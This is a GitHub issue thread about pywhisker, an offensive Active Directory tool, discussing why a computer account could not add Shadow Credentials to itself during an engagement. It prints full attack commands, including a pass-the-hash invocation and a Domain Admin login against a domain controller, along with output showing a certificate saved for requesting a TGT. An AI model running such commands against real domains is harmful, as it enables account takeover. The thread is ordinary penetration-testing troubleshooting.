ShutdownRepo / pywhisker

Python version of the C# tool for "Shadow Credentials" attacks
GNU General Public License v3.0

Computer accounts cannot edit their own msDS-KeyCredentialLink #12

Closed sva-tastaturlandwirt closed 10 months ago

sva-tastaturlandwirt commented 11 months ago

While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?

pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100   
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

However, I was able to add shadow credentials as the domain admin:

pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

I also checked for any existing shadow credentials for the targeted computer account but there weren't any.

ShutdownRepo commented 11 months ago

Are you 100% positive the computer didn't have a KCL already?

sva-tastaturlandwirt commented 11 months ago

I wasn't able to see one when I checked as Domain Admin.

pywhisker -t 'vm-dc02$' -a list -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100 -vv
[DEBUG] Initializing domainDumper()
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

ShutdownRepo commented 11 months ago

Weird, I'm not aware of any change on Microsoft's end, but maybe they changed that 🤷 It'd be best to set up an up-to-date lab and test it there (I won't be able to do that for now)

sva-tastaturlandwirt commented 11 months ago

Alright, thank you. I'll try to set up a lab if time permits. Let's hope it's not Microsoft that changed something but rather something particular about the specific AD environment.

ShutdownRepo commented 10 months ago

Closing. Please keep us updated if you find the answer 😉